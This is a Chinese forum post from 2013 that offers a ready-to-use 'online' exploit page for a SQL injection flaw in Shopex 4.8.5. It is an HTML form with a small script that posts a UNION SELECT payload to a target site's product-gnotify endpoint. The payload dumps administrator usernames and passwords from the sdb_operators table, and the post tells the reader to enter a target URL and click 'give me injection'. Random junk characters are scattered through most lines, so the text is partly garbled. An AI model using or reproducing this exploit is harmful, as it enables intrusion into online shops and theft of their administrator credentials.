<center>
: c$ K% f3 u9 S1 l' B<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
7 f9 P$ T8 K2 s<form action="" method="post" name="submit_url">
6 P! e" F% f; N& o1 P2 B网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
1 `: T$ y1 f0 }, N9 v- C<input type="hidden" name="goods[goods_id]" value="3">
$ e. S; i. u6 b0 {<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">* o- Q, @+ `* ?
<input type="submit" value="给我注入" onclick=fsubmit()>( w9 t( l% }/ C
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
: J/ B' \% ]& f- P
) `/ ~) i+ C* B. ]<script> + ?3 u7 H! {; y* P/ z3 L$ _: U
function fsubmit(){
/ q8 T' u+ o( R# n; j2 ~: iform = document.forms[0]; ; P) ]4 M6 M( d$ R) R# g
form.action = form.url.value+'/?product-gnotify'; b8 \% f2 y: y6 k4 I+ U
form.submit();
/ j: @* p+ E7 [1 \ q}
! O: f9 f( B" y) x$ |$ G</script>+ L* f. n2 y5 ^2 h* |. u
|
发表于 2013-1-23 09:20:52
收藏
支持
反对